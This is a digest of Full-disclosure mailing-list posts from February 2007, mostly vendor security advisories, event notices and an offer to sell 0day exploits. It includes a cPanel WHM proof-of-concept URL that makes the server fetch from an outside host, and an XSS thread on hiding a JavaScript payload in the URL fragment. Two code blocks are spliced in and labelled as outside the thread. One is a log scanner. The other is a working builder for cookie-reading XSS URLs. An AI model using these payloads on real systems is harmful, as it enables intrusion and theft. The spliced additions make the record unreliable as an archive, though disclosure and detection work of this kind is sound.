[Full-disclosure] rPSA-2007-0025-2 postgresql postgresql-server

2007-02-07 Thread rPath Update Announcements
rPath Security Advisory: 2007-0025-2
Published: 2007-02-06
Updated:
2007-02-07 PostgreSQL 8.1.8 corrects regression
Products: rPath Linux 1
Rating: Major
Exposure Level Classification:
Local User Deterministic Vulnerability
Updated Versions:
postgresql=/[EMAIL PROTECTED]:devel//1/8.1.7-0.1-1
postgresql-server=/[EMAIL PROTECTED]:devel//1/8.1.7-0.1-1

References:
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0555
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0556
https://issues.rpath.com/browse/RPL-830
https://issues.rpath.com/browse/RPL-1025

Description:
Previous versions of the postgresql package are vulnerable to two
attacks in which an authenticated database user can cause the
database server process to crash (Denial of Service), and possibly
also read privileged database content (Information Exposure).

7 February 2007 Update: The security fix provided in PostgreSQL 8.1.7
introduced a functional regression: it added an overly-restrictive
check for type length in constraints and functional indexes.
PostgreSQL 8.1.8 corrects this error.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] WHM Exploit question

2007-02-07 Thread Steve Ragan
Is this one of the items patched in the recent update to WHM?
I see no info about it anywhere on the web or the Cpanel forums. Is this a
new 0-Day and if so does anyone know a security contact for Cpanel? Using
the forum, or general address are worthless at times.

Thanks

Steve


Exploit below:
name : web host manager
vendor : cpanel.net
by : s3rv3r_hack3r (ali [at] hackerz [dot] ir)
web-site : www.hackerz.ir - ali.hackerz.ir
exploit:
http://domain.com:2086/scripts2/objcache?obj=http://www.hackerz.ir/?


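A check a WHM administrator could run while waiting for a vendor answer, added here as an example and not part of Steve's post or of cPanel's code: scan the access log for requests of the exact shape in the PoC, that is /scripts2/objcache called with an absolute URL in obj= that points off-host. The Apache combined log format, the constructed sample lines and the server's own hostnames are assumptions; the example claims nothing about what objcache does with the URL beyond what the PoC shows.

```javascript
// Added example, not code from the thread or from cPanel: hunt an access log
// for requests shaped like the PoC (/scripts2/objcache?obj=<absolute URL>).
// Log format (Apache combined) and the server's own hostnames are assumptions.

// Hostnames that may legitimately appear in obj= (assumed for this example).
const OWN_HOSTS = new Set(['localhost', '127.0.0.1', 'whm.example.com']);

// Constructed sample lines; the first and the last are the pattern to catch.
const SAMPLE_LOG = [
  '10.0.0.5 - - [07/Feb/2007:10:01:12 +0000] "GET /scripts2/objcache?obj=http://www.hackerz.ir/? HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
  '10.0.0.5 - - [07/Feb/2007:10:01:13 +0000] "GET /scripts2/objcache?obj=images/logo.gif HTTP/1.1" 200 3011 "-" "Mozilla/5.0"',
  '192.168.1.9 - root [07/Feb/2007:10:02:40 +0000] "GET /scripts2/listaccts HTTP/1.1" 200 8820 "-" "Mozilla/5.0"',
  '10.0.0.7 - - [07/Feb/2007:10:03:01 +0000] "GET /scripts2/objcache?obj=https%3A%2F%2Fattacker.example%2Fp HTTP/1.1" 200 77 "-" "curl/7.15"',
];

// client, ident, user, [time], "METHOD target HTTP/x.y", status
const LINE_RE = /^(\S+) \S+ (\S+) \[([^\]]+)\] "(GET|POST|HEAD) (\S+) HTTP\/[\d.]+" (\d{3})/;

// Parse one line into its parts, or null if it is not in the expected format.
function parseLine(line) {
  const m = LINE_RE.exec(line);
  if (!m) return null;
  return { ip: m[1], user: m[2], time: m[3], method: m[4], target: m[5], status: m[6] };
}

// Hostname if obj is an absolute http(s) URL pointing off-host, otherwise null.
function offHostTarget(obj) {
  let u;
  try { u = new URL(obj); } catch (e) { return null; } // relative value, not absolute
  if (u.protocol !== 'http:' && u.protocol !== 'https:') return null;
  return OWN_HOSTS.has(u.hostname) ? null : u.hostname;
}

// Every objcache request whose obj= parameter names an external host.
function findObjcacheFetches(lines) {
  const hits = [];
  for (const line of lines) {
    const rec = parseLine(line);
    if (!rec) continue;
    let req;
    // Resolve the request target against a dummy origin so URL parsing applies.
    try { req = new URL(rec.target, 'http://whm.example.com:2086'); } catch (e) { continue; }
    if (req.pathname !== '/scripts2/objcache') continue;
    const obj = req.searchParams.get('obj'); // percent-decoded, as the server would see it
    const host = obj ? offHostTarget(obj) : null;
    if (host) hits.push({ ip: rec.ip, time: rec.time, host, status: rec.status });
  }
  return hits;
}

console.log(findObjcacheFetches(SAMPLE_LOG));
```

Feed it the real log instead of SAMPLE_LOG and add the hostnames your own pages fetch through objcache to OWN_HOSTS; anything left over is a request to fetch a third-party URL through the WHM port, whether or not the vendor has changed the endpoint.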


Re: [Full-disclosure] [WEB SECURITY] Useful technique when performing XSS

2007-02-07 Thread pdp (architect)
Hei Amit,

On 2/7/07, Amit Klein <[EMAIL PROTECTED]> wrote:
> pdp (architect) wrote:
> > Amit,
> >
> > :) This is not about who did it first.
>
> Agreed. But it would be nice to receive the credit ;-)

Sorry, man. Had I known that you had discussed this before, I would
definitely have given you the credit. :)

> > BTW, your example is broken.
> > location.search does not include the fragment identifier.
> >
>
> Guilty as charged. I remember working directly with document.location
> (which includes the hostname and path) when I investigated the issue,
> then when I wrote my text I decided that a more elegant way would be
> with the ".search" property, but I failed to verify that it actually
> works. Thanks for pointing this out, and here's the formal errata:
>
> In
> http://www.webappsec.org/lists/websecurity/archive/2005-10/msg00030.html,
> the example should be:
>
> http://target.site/vulnscript.cgi?injectme=
> eval(document.location.substr(...[fill
> in the offset here]...))#...JS payload here...
>
> Thanks to "pdp (architect)" for pointing this out.
>
> Regards,
> -Amit
>
>
> > Cheers
> >
> > On 2/7/07, Amit Klein <[EMAIL PROTECTED]> wrote:
> >> pdp (architect) wrote:
> >> > http://www.gnucitizen.org/blog/playing-in-large
> >> >
> >> > Basically this article is about how to squeeze more data into size
> >> > restricted, unsanitized field. This technique can also be used to hide
> >> > attackers activities.
> >> >
> >> It seems that you've stumbled upon something I already disclosed:
> >> http://www.webappsec.org/lists/websecurity/archive/2005-10/msg00030.html
> >>
> >> Sorry...
> >> -Amit
> >>
> >>
> >
> >
>
>


-- 
pdp (architect) | petko d. petkov
http://www.gnucitizen.org



[Full-disclosure] Call for Papers: IT-Incident Management and IT-Forensics 2007

2007-02-07 Thread Oliver Goebel
Dear all,

for your information.


 CALL FOR PAPERS

IMF 2007

  3rd International Conference on
   IT-Incident Management & IT-Forensics

   Stuttgart, Germany
 September 11 - 12, 2007

   http://www.imf-conference.org/
   mailto:[EMAIL PROTECTED]

---

Information technology has become crucial to almost every part of society.
IT infrastructures have become critical in the world-wide economy, the
financial sector, the health sector, the government's administration, the
military, and the educational sector.

Because of this importance, the disruption or loss of IT capabilities
results in a massive reduction of operability.  Hence, IT security is
continuously gaining importance.

Although security is usually involved in the design process of IT
systems nowadays, the process of maintaining security in the operation of IT
infrastructures still lacks appropriate attention in most cases.
In particular, the capability to manage and respond to IT security incidents
and to analyse them forensically is established only in the rarest cases. The
quickly rising number of security incidents worldwide makes the implementation
of incident management capabilities essential.

In order to advance the fields of IT-Incident Management and Forensics
the special interest-group Security - Intrusion Detection and Response
(SIDAR) of the German Informatics Society (GI) organises an annual
conference in co-operation with Stuttgart University's Computer
Emergency Response Team (RUS-CERT) and the Fraunhofer Institute for
Industrial Engineering (IAO), bringing together experts from throughout
the world, to discuss the state of the art in the areas of Incident
Management and  IT-Forensics (IMF). IMF promotes collaboration and
exchange of ideas between industry, academia, law-enforcement and other
government bodies.

IMF invites the submission of:
--

 - Full papers of up to 20 pages, presenting novel and mature research
   results. 

 - Practice papers of up to 20 pages, describing best practices, case
   studies, lessons learned, or latest developments in technology. 

All submissions must be in English, and in either PostScript or PDF
format.  Authors of accepted papers must ensure that their papers will
be presented at the conference. Presentations should be given in
English.

Submitted full papers must not substantially overlap papers that have
been  published elsewhere or that are simultaneously submitted to a
journal or a conference with proceedings.

Details on the electronic submission procedure as well as detailed
registration information are provided on the conference Web site.

The scope of IMF 2007 is broad and includes, but is not restricted to the
following areas:

 IT-Incident Management:

- Purposes of IT-Incident Management
- Trends, Processes and Methods of IT-Incident Management
- Formats and Standardization for IT-Incident Management
- Tools for the IT-Incident Management
- Education and Training in the field of IT-Incident Management Awareness
- Determination, Detection and Evaluation of Incidents
- Procedures for Handling Incidents
- Problems and Challenges while establishing CERTs/ CSIRTs
- Sources of Information/ Information Exchange/ Communities
- Dealing with Vulnerabilities (vulnerability response)
- Current Threats
- Early Warning Systems
- Organizations (Nat. CERT-Associations, FIRST, TERENA/ TI, TF-CSIRT,
  etc)

 IT-Forensics:

- Trends and Challenges in IT-Forensics
- Methods, Processes and Applications for IT-Forensics
  (Networks, Operating Systems, Storage Media, ICT Systems etc.)
- Evidence Protection in IT-Environments
- Standardization of Evidence Protection Processes
- Data Protection and other legal implications for IT-Forensics
- Methods in Investigation
- Legal Relevance of IT-Forensics Investigations
- Tools for IT-Forensics
- IT-Forensics Readiness

Important Dates:

- May 14, 2007: Deadline for Submissions 
- June 26, 2007: Notification of acceptance or rejection
- July 17, 2007: Final paper camera ready copy due
- September 11-12, 2007: IMF 2007 Conference


General Chair:
--
  Oliver Goebel, RUS-CERT, Universitaet Stuttgart
  [EMAIL PROTECTED]

Program Chair:
--
 Sandra Frings, Fraunhofer IAO
  [EMAIL PROTECTED]

Sponsor Chair:
--
  Dirk Schadt, SPOT
  [EMAIL PROTECTED]


Program Committee
-
  see
  
http://www.gi-ev.de/fachbereiche/sicherheit/fg/sidar/imf/imf2007/committee.html

Organizing Committee:
-
  Sandra Frings, Fraunhofer IAO
  Oliver Goebel, RUS-CERT, Universitaet Stuttgart
  Detlef Guenther, Volkswagen AG
  Hardo G. Hase, IT-Consulting Hardo G. Hase
  Jens Nedon, Con

[Full-disclosure] 0day remote vuln selling SAP / Linux Kernel / PHP etc...

2007-02-07 Thread toto toto
Hi,

I'm selling 0day vulnerabilities and/or exploits for code execution for: SAP,
Linux Kernel, PHP, Snort, GRSECURITY, and some other applications/tools...

Regards,


   snacker




Re: [Full-disclosure] [WEB SECURITY] Useful technique when performing XSS

2007-02-07 Thread Amit Klein
pdp (architect) wrote:
> Hei Amit,
>
> On 2/7/07, Amit Klein <[EMAIL PROTECTED]> wrote:
>> pdp (architect) wrote:
>> > Amit,
>> >
>> > :) This is not about who did it first.
>>
>> Agreed. But it would be nice to receive the credit ;-)
>
> Sorry man. I knew that you have discussed this before I would
> definitely give you the credits. :)
>

No worries, mate!

>> In
>> http://www.webappsec.org/lists/websecurity/archive/2005-10/msg00030.html, 
>>
>> the example should be:
>>
>> http://target.site/vulnscript.cgi?injectme=
>> eval(document.location.substr(...[fill
>>  
>>
>> in the offset here]...))#...JS payload here...
>>

Of course, I meant document.location.href.substr(...), i.e.:

http://target.site/vulnscript.cgi?injectme=eval(document.location.href.substr(...[fill in the offset here]...))#...JS payload here...

-Amit

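The technique under discussion, as an added example that is not code from the thread or from either author's post: the stub placed in the size-restricted parameter reads the real payload out of the URL fragment, and the fragment only shows up in location.href (or location.hash), never in location.search, which is the point of the errata above. The base URL and payload are constructed for the example; Node's WHATWG URL class stands in for the browser's document.location, since it splits a URL the same way.

```javascript
// Added example, not code from the thread: shows why the errata needs
// location.href rather than location.search, and how the fixed offset inside
// the stub is computed. Node's URL class stands in for document.location.

// Assumed injection point: a reflected parameter with a short length limit.
const BASE = 'http://target.site/vulnscript.cgi?injectme=';

// Constructed payload; in the attack this is the full script the field could
// never hold. It sits after '#', which the browser never sends to the server.
const PAYLOAD = 'alert(document.cookie)';

// Build the final URL. The stub's length depends on the digits of the offset
// and the offset depends on the stub's length, so iterate to a fixed point.
function assemble(base, payload) {
  let offset = base.length;
  for (;;) {
    const stub = `eval(location.href.substr(${offset}))`;
    const start = base.length + stub.length + 1; // +1 for the '#'
    if (start === offset) {
      return { url: base + stub + '#' + payload, stub, offset };
    }
    offset = start;
  }
}

// What each Location property holds for a given URL.
function locationParts(url) {
  const u = new URL(url);
  return { href: u.href, search: u.search, hash: u.hash };
}

// Simulate the stub running in the browser: href from the offset onwards.
function payloadSeenByStub(url, offset) {
  return locationParts(url).href.substr(offset);
}

// The broken form from the original post: does location.search carry the payload?
function searchCarriesPayload(url) {
  const { search, hash } = locationParts(url);
  return hash.length > 1 && search.includes(hash.slice(1));
}

const built = assemble(BASE, PAYLOAD);
console.log(built.stub);                                 // the only text that reaches the server
console.log(payloadSeenByStub(built.url, built.offset)); // what eval() receives
console.log(searchCarriesPayload(built.url));            // false
```

Only the query string reaches the server; the fragment stays in the browser, so the payload never appears in the target's access log, which is the "hide attacker activity" angle pdp mentions. A stub that avoids the offset arithmetic altogether is eval(location.hash.substr(1)), since location.hash returns the fragment with its leading '#'.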


Re: [Full-disclosure] [WEB SECURITY] Useful technique when performing XSS

2007-02-07 Thread Amit Klein
pdp (architect) wrote:
> Amit,
>
> :) This is not about who did it first. 

Agreed. But it would be nice to receive the credit ;-)
> BTW, your example is broken.
> location.search does not include the fragment identifier.
>

Guilty as charged. I remember working directly with document.location 
(which includes the hostname and path) when I investigated the issue, 
then when I wrote my text I decided that a more elegant way would be 
with the ".search" property, but I failed to verify that it actually 
works. Thanks for pointing this out, and here's the formal errata:

In 
http://www.webappsec.org/lists/websecurity/archive/2005-10/msg00030.html, 
the example should be:

http://target.site/vulnscript.cgi?injectme=eval(document.location.substr(...[fill in the offset here]...))#...JS payload here...

Thanks to "pdp (architect)" for pointing this out.  

Regards,
-Amit


> Cheers
>
> On 2/7/07, Amit Klein <[EMAIL PROTECTED]> wrote:
>> pdp (architect) wrote:
>> > http://www.gnucitizen.org/blog/playing-in-large
>> >
>> > Basically this article is about how to squeeze more data into size
>> > restricted, unsanitized field. This technique can also be used to hide
>> > attackers activities.
>> >
>> It seems that you've stumbled upon something I already disclosed:
>> http://www.webappsec.org/lists/websecurity/archive/2005-10/msg00030.html
>>
>> Sorry...
>> -Amit
>>
>>
>
>



Re: [Full-disclosure] [WEB SECURITY] Useful technique when performing XSS

2007-02-07 Thread pdp (architect)
Amit,

:) This is not about who did it first. BTW, your example is broken.
location.search does not include the fragment identifier.

Cheers

On 2/7/07, Amit Klein <[EMAIL PROTECTED]> wrote:
> pdp (architect) wrote:
> > http://www.gnucitizen.org/blog/playing-in-large
> >
> > Basically this article is about how to squeeze more data into size
> > restricted, unsanitized field. This technique can also be used to hide
> > attackers activities.
> >
> It seems that you've stumbled upon something I already disclosed:
> http://www.webappsec.org/lists/websecurity/archive/2005-10/msg00030.html
>
> Sorry...
> -Amit
>
>


-- 
pdp (architect) | petko d. petkov
http://www.gnucitizen.org



Re: [Full-disclosure] [WEB SECURITY] Useful technique when performing XSS

2007-02-07 Thread Amit Klein
pdp (architect) wrote:
> http://www.gnucitizen.org/blog/playing-in-large
>
> Basically this article is about how to squeeze more data into size
> restricted, unsanitized field. This technique can also be used to hide
> attackers activities.
>
It seems that you've stumbled upon something I already disclosed:
http://www.webappsec.org/lists/websecurity/archive/2005-10/msg00030.html

Sorry...
-Amit



Re: [Full-disclosure] [Full-Disclosure] (Psexec on *NIX)

2007-02-07 Thread Denis Jedig
On Wed, 31 Jan 2007 20:31:21 +0100 Gianluca Giacometti wrote:

> Moreover I already use PSExec on my windows PCs to do all the stuff.
> What I would like to do is use just the website platform and for that 
> reason I'm looking for something similar to PSExec under linux.

I believe you're looking for something to execute commands on remote
Windows machines via RPC from a linux management station. If so, winexe
from the Samba4 fork probably is what you're looking for:
http://eol.ovh.org/winexe/

-- 
Denis Jedig
syneticon networks GbR http://syneticon.net/service/



[Full-disclosure] February 9th Chicago 2600/DefCon312 Meeting

2007-02-07 Thread Steven McGrath
NOTE: The Meeting is the Second week this month due to restrictions
placed on the venue.

The February Chicago 2600 Meeting is near! The meeting will be Friday,
Feb 9th at the Neighborhood Boys and Girls Club and will feature much
of the same usual fun that all of you have grown to expect!

[Special Meeting Information]
Chicago TOOOL Meeting will also be going on in the same building.
Omikron from TOOOL will be in attendance as well!
http://www.toool.nl/index-eng.php

[Presentation Information]
- 8:00pm - The Future of Chicago TOOOL (Omikron)
- 9.00pm - Chicago Con (DJ SubZero)
- 10:00pm - How to build a public server (Maniac) [Tentative]
- After hours - Wii, Music, Socializing, etc.

[General Information]
- Meeting Time: 7.00pm - Approx. 3-5am
- Meeting Date: Friday, Feb. 9th
- Place : 2501 W Irving Park Road, Chicago
- More Info : http://chicago2600.net



[Full-disclosure] [ MDKSA-2007:040 ] - Updated kernel packages fix multiple vulnerabilities and bugs

2007-02-07 Thread security

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDKSA-2007:040
 http://www.mandriva.com/security/
 ___
 
 Package : kernel
 Date: February 7, 2007
 Affected: 2007.0
 ___
 
 Problem Description:
 
 Some vulnerabilities were discovered and corrected in the Linux 2.6
 kernel:

 The isdn_ppp_ccp_reset_alloc_state function in drivers/isdn/isdn_ppp.c
 in the Linux 2.4 kernel before 2.4.34-rc4, as well as the 2.6 kernel,
 does not call the init_timer function for the ISDN PPP CCP reset state
 timer, which has unknown attack vectors and results in a system crash.
 (CVE-2006-5749)

 The listxattr syscall can corrupt user space under certain
 circumstances. The problem seems to be related to signed/unsigned
 conversion during size promotion. (CVE-2006-5753)

 The ext3fs_dirhash function in Linux kernel 2.6.x allows local users to
 cause a denial of service (crash) via an ext3 stream with malformed
 data structures. (CVE-2006-6053)

 The mincore function in the Linux kernel before 2.4.33.6, as well as
 the 2.6 kernel, does not properly lock access to user space, which has
 unspecified impact and attack vectors, possibly related to a deadlock.
 (CVE-2006-4814)

 The provided packages are patched to fix these vulnerabilities.  All
 users are encouraged to upgrade to these updated kernels immediately
 and reboot to effect the fixes.

 In addition to these security fixes, other fixes have been included
 such as:

 - Add Ralink RT2571W/RT2671 WLAN USB support (rt73 module)
 - Fix sys_msync() to report -ENOMEM as before when an unmapped area falls
   within its range, and not to overshoot (LSB regression)
 - Avoid disk sector_t overflow for >2TB ext3 filesystem
 - USB: workaround to fix HP scanners detection (#26728)
 - USB: unusual_devs.h for Sony floppy (#28378)
 - Add preliminary ICH9 support
 - Add TI sd card reader support
 - Add RT61 driver
 - KVM update
 - Fix bttv vbi offset

 To update your kernel, please follow the directions located at:

 http://www.mandriva.com/en/security/kernelupdate
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5749
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5753
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6053
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4814
 ___
 
 Updated Packages:
 
 Mandriva Linux 2007.0:
 ad34fe5a73feafdd8e69b504ebf93946  
2007.0/i586/kernel-2.6.17.10mdv-1-1mdv2007.0.i586.rpm
 d9e55a7e4f1008da15c67d1287956969  
2007.0/i586/kernel-doc-2.6.17.10mdv-1-1mdv2007.0.i586.rpm
 a9c50df979df9e3689873978436bd16f  
2007.0/i586/kernel-enterprise-2.6.17.10mdv-1-1mdv2007.0.i586.rpm
 f533abc7ea70bd3faaa9e6b28a99ab28  
2007.0/i586/kernel-legacy-2.6.17.10mdv-1-1mdv2007.0.i586.rpm
 b8ff79d0ab16056f2d254e9d679984f7  
2007.0/i586/kernel-source-2.6.17.10mdv-1-1mdv2007.0.i586.rpm
 850dbb1496700b2f93ef37e4540164cc  
2007.0/i586/kernel-source-stripped-2.6.17.10mdv-1-1mdv2007.0.i586.rpm
 6e5109401747d368e768bb7ccce1c6e3  
2007.0/i586/kernel-xen0-2.6.17.10mdv-1-1mdv2007.0.i586.rpm
 0982fc7135735d78b4805c2af67ffe19  
2007.0/i586/kernel-xenU-2.6.17.10mdv-1-1mdv2007.0.i586.rpm 
 2cfb0d90ab5aea99bacf8a721552554b  
2007.0/SRPMS/kernel-2.6.17.10mdv-1-1mdv2007.0.src.rpm

 Mandriva Linux 2007.0/X86_64:
 8228636d0969cdb0de42baeab61ece09  
2007.0/x86_64/kernel-2.6.17.10mdv-1-1mdv2007.0.x86_64.rpm
 935eb44188aa2784386dd8bcc93dfd78  
2007.0/x86_64/kernel-doc-2.6.17.10mdv-1-1mdv2007.0.x86_64.rpm
 9abb549acacc17385051ceebcb3331fe  
2007.0/x86_64/kernel-source-2.6.17.10mdv-1-1mdv2007.0.x86_64.rpm
 7e3667b9f28f3214669f831955ef059d  
2007.0/x86_64/kernel-source-stripped-2.6.17.10mdv-1-1mdv2007.0.x86_64.rpm
 648ae5f919580ce2df42f6a522aba7c9  
2007.0/x86_64/kernel-xen0-2.6.17.10mdv-1-1mdv2007.0.x86_64.rpm
 0ad1d27a9232f5f7cf8ae218bef5a618  
2007.0/x86_64/kernel-xenU-2.6.17.10mdv-1-1mdv2007.0.x86_64.rpm 
 2cfb0d90ab5aea99bacf8a721552554b  
2007.0/SRPMS/kernel-2.6.17.10mdv-1-1mdv2007.0.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 __

[Full-disclosure] [ MDKSA-2007:039 ] - Updated gtk+2.0 packages address DoS, LSB issues, several bugs

2007-02-07 Thread security

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDKSA-2007:039
 http://www.mandriva.com/security/
 ___
 
 Package : gtk+2.0
 Date: February 7, 2007
 Affected: 2007.0, Corporate 3.0, Corporate 4.0
 ___
 
 Problem Description:
 
 The GdkPixbufLoader function in GIMP ToolKit (GTK+) in GTK 2 (gtk2)
 allows context-dependent attackers to cause a denial of service (crash)
 via a malformed image file. (CVE-2007-0010)

 The version of libgtk+2.0 shipped with Mandriva Linux 2007 fails
 various portions of the lsb-test-desktop test suite, part of LSB 3.1
 certification testing.

 The updated packages also address the following issues:

 The Home and Desktop entries in the GTK File Chooser are not always
 visible (#26644).

 GTK+-based applications (which includes all the Mandriva Linux
 configuration tools, for example) crash (instead of falling back to the
 default theme) when an invalid icon theme is selected. (#27013)

 Additional patches from GNOME CVS have been included to address the
 following issues from the GNOME bugzilla:

 * 357132 - fix RGBA colormap issue
 * 359537, 357280, 359052 - fix various printer bugs
 * 357566, 353736, 357050, 363437, 379503 - fix various crashes
 * 372527 - fix fileselector bug + potential deadlock
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0010
 http://qa.mandriva.com/show_bug.cgi?id=26644
 http://qa.mandriva.com/show_bug.cgi?id=27013
 ___
 
 Updated Packages:
 
 Mandriva Linux 2007.0:
 6b0b76ba984d8432cca4e8d938c51844  
2007.0/i586/gtk+2.0-2.10.3-5.3mdv2007.0.i586.rpm
 015aa62677f20cf6b9f89301014ccf4d  
2007.0/i586/libgdk_pixbuf2.0_0-2.10.3-5.3mdv2007.0.i586.rpm
 8f6bc5e09ee08263633e3601d1d21069  
2007.0/i586/libgdk_pixbuf2.0_0-devel-2.10.3-5.3mdv2007.0.i586.rpm
 ef1f5a96362f5fafb982520897283919  
2007.0/i586/libgtk+-x11-2.0_0-2.10.3-5.3mdv2007.0.i586.rpm
 b96eeb174cba468e8064890668b43a56  
2007.0/i586/libgtk+2.0_0-2.10.3-5.3mdv2007.0.i586.rpm
 65f2ea83177a38b1682f4d4e5e633aea  
2007.0/i586/libgtk+2.0_0-devel-2.10.3-5.3mdv2007.0.i586.rpm 
 4f15cba4c1c1b6e37dfe9f0b5b73401c  
2007.0/SRPMS/gtk+2.0-2.10.3-5.3mdv2007.0.src.rpm

 Mandriva Linux 2007.0/X86_64:
 b2470dc8cd884cf15dc47e29dbdb36de  
2007.0/x86_64/gtk+2.0-2.10.3-5.3mdv2007.0.x86_64.rpm
 11d3f44a7f55f4899984e33a07c8f722  
2007.0/x86_64/lib64gdk_pixbuf2.0_0-2.10.3-5.3mdv2007.0.x86_64.rpm
 33c26bea1a14b147f41e45467d6894e3  
2007.0/x86_64/lib64gdk_pixbuf2.0_0-devel-2.10.3-5.3mdv2007.0.x86_64.rpm
 2e3855166383646465a01bd56e1529b7  
2007.0/x86_64/lib64gtk+-x11-2.0_0-2.10.3-5.3mdv2007.0.x86_64.rpm
 4fea83682012ad4c5571e205b04dc7d1  
2007.0/x86_64/lib64gtk+2.0_0-2.10.3-5.3mdv2007.0.x86_64.rpm
 04f7f152d4e99d6c71043554e2adfa3a  
2007.0/x86_64/lib64gtk+2.0_0-devel-2.10.3-5.3mdv2007.0.x86_64.rpm 
 4f15cba4c1c1b6e37dfe9f0b5b73401c  
2007.0/SRPMS/gtk+2.0-2.10.3-5.3mdv2007.0.src.rpm

 Corporate 3.0:
 7d4501132efb62d24276152ccc23a2e0  
corporate/3.0/i586/gtk+2.0-2.2.4-10.6.C30mdk.i586.rpm
 f8828f652ae310e3de135f181e3c6f19  
corporate/3.0/i586/libgdk_pixbuf2.0_0-2.2.4-10.6.C30mdk.i586.rpm
 d99f6327006f96e8b170c20500d64985  
corporate/3.0/i586/libgdk_pixbuf2.0_0-devel-2.2.4-10.6.C30mdk.i586.rpm
 f2a98b2036167b780e87e2cd0d105983  
corporate/3.0/i586/libgtk+-linuxfb-2.0_0-2.2.4-10.6.C30mdk.i586.rpm
 e28fbfc9664db29c37517ca8957647c0  
corporate/3.0/i586/libgtk+-linuxfb-2.0_0-devel-2.2.4-10.6.C30mdk.i586.rpm
 8b80464f88674e0bf5f7ed06efafcb72  
corporate/3.0/i586/libgtk+-x11-2.0_0-2.2.4-10.6.C30mdk.i586.rpm
 b154589c077c790b1f71379194ed84a6  
corporate/3.0/i586/libgtk+2.0_0-2.2.4-10.6.C30mdk.i586.rpm
 819ee9fa563420c37d7cae612c3a6bec  
corporate/3.0/i586/libgtk+2.0_0-devel-2.2.4-10.6.C30mdk.i586.rpm 
 dbe156cf5e976fc744b635eab3e4  
corporate/3.0/SRPMS/gtk+2.0-2.2.4-10.6.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 bed655ae3c4d6635e87488eefebe7e12  
corporate/3.0/x86_64/gtk+2.0-2.2.4-10.6.C30mdk.x86_64.rpm
 369daff90b35687abae6ad34cf513af3  
corporate/3.0/x86_64/lib64gdk_pixbuf2.0_0-2.2.4-10.6.C30mdk.x86_64.rpm
 3675f57dd8e738cd1674db6518cd7c0d  
corporate/3.0/x86_64/lib64gdk_pixbuf2.0_0-devel-2.2.4-10.6.C30mdk.x86_64.rpm
 28dfaebd73dacca8fc2497caeac619a5  
corporate/3.0/x86_64/lib64gtk+-linuxfb-2.0_0-2.2.4-10.6.C30mdk.x86_64.rpm
 22b487085911cce6fa8a5f2d6557009b  
corporate/3.0/x86_64/lib64gtk+-linuxfb-2.0_0-devel-2.2.4-10.6.C30mdk.x86_64.rpm
 e0cf2152fc480ab73e4236de7a186d23  
corporate/3.0/x86_64/lib64gtk+-x11-2.0_0-2.2.4-10.6.C30mdk.x86_64.rpm
 512547fd9c3efca43b7c000fdbaedec3  
corporate/3.0/x86_64/lib64gtk+2.0_0-2.2.4-10.6.C30mdk

[Full-disclosure] iDefense Security Advisory 02.07.07: Trend Micro AntiVirus UPX Parsing Kernel Buffer Overflow Vulnerability

2007-02-07 Thread iDefense Labs
Trend Micro AntiVirus UPX Parsing Kernel Buffer Overflow Vulnerability

iDefense Security Advisory 02.07.07
http://labs.idefense.com/intelligence/vulnerabilities/
Feb 07, 2007

I. BACKGROUND

The Trend Micro AntiVirus scan engine provides anti-virus capabilities to
desktop, server and gateway systems. The engine is licensed to several of
Trend Micro's OEM partners. More information is available on Trend Micro's
web site at the following URL.

http://www.trendmicro.com/

II. DESCRIPTION

Remote exploitation of a buffer overflow vulnerability within Trend Micro's
AntiVirus engine could allow an attacker to crash the scan engine or
execute arbitrary code.

This vulnerability is caused by improper input validation when scanning
specially crafted malformed UPX compressed executables. Memory corruption
could occur, leading to an invalid memory access or a potentially
exploitable condition.

III. ANALYSIS

Exploitation allows attackers to crash the scan engine or execute arbitrary
code.

This vulnerability could be used to gain unauthorized access to machines
through common protocols, e.g. SMTP, HTTP, FTP. No authentication is
required for an attacker to leverage this vulnerability.

Under Windows, the scan engine runs in kernel context. Under Linux, the
scan engine runs as a daemon with superuser privileges. As such, an
attacker can take complete control of the affected system if successful
code execution is attained.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in our
vulnerability lab. The configurations at verification time were as
follows:

 * Trend Micro's PC-Cillin Internet Security 2007
 * VsapiNI.sys (scan engine) version 3.320.0.1003

 * ServerProtect for Linux v2.5 on RHEL 4.x
 * vsapiapp version 8.310

Any implementations based on Trend Micro's AntiVirus scan engine are
likely vulnerable in their default configuration.

V. WORKAROUND

iDefense is currently unaware of any effective workaround for this issue.

VI. VENDOR RESPONSE

"To address this vulnerability, Trend Micro recommends customers to update
to Virus Pattern File 4.245.00 or higher."

For more information, consult the Trend Micro Knowledge Base article at
the link shown below.

http://esupport.trendmicro.com/support/viewxml.do?ContentID=EN-1034289

VII. CVE INFORMATION

A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not
been assigned yet.

VIII. DISCLOSURE TIMELINE

01/17/2007  Initial vendor notification
01/19/2007  Initial vendor response
02/07/2007  Coordinated public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2006 iDefense, Inc.

Permission is granted for the redistribution of this alert electronically.
